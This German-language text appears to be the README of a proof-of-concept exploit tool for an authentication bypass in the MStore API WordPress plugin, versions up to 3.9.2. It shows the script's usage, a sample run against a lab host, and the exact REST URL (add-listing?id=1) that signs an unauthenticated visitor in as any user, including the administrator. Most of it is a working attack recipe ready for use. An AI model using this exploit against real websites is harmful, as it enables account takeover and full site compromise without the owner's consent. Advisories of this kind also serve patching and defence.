
MStore API <= 3.9.2 - Umgehung der Authentifizierung
Das MStore API Plugin für WordPress ist in Versionen bis einschließlich 3.9.2 anfällig für eine Authentifizierungsumgehung. Dies ist auf eine unzureichende Überprüfung des bei der REST-API-Anfrage zum Hinzufügen von Einträgen über das Plugin bereitgestellten Benutzers zurückzuführen. Dadurch können nicht authentifizierte Angreifer sich als jeder vorhandene Benutzer der Website anmelden, z. B. als Administrator, sofern ihnen die Benutzer-ID bekannt ist.
usage: mstore-api.py [-h] -u URL
options:
-h, --help show this help message and exit
-u URL, --url URL URL of the WordPress site
python3 mstore-api.py -u http://wordpress.lan
Die Plugin-Version ist unter 3.9.3.
Wählen Sie einen Benutzer:
1. admin
Geben Sie die Benutzer-ID ein: 1
Glückwunsch, ein anfälliges System wurde gefunden.
Ausnutzung:
Besuchen Sie die folgende URL: http://wordpress.lan/wp-json/wp/v2/add-listing?id=1
Besuchen Sie http://wordpress.lan und Sie sollten als der von Ihnen gewählte Benutzer angemeldet sein.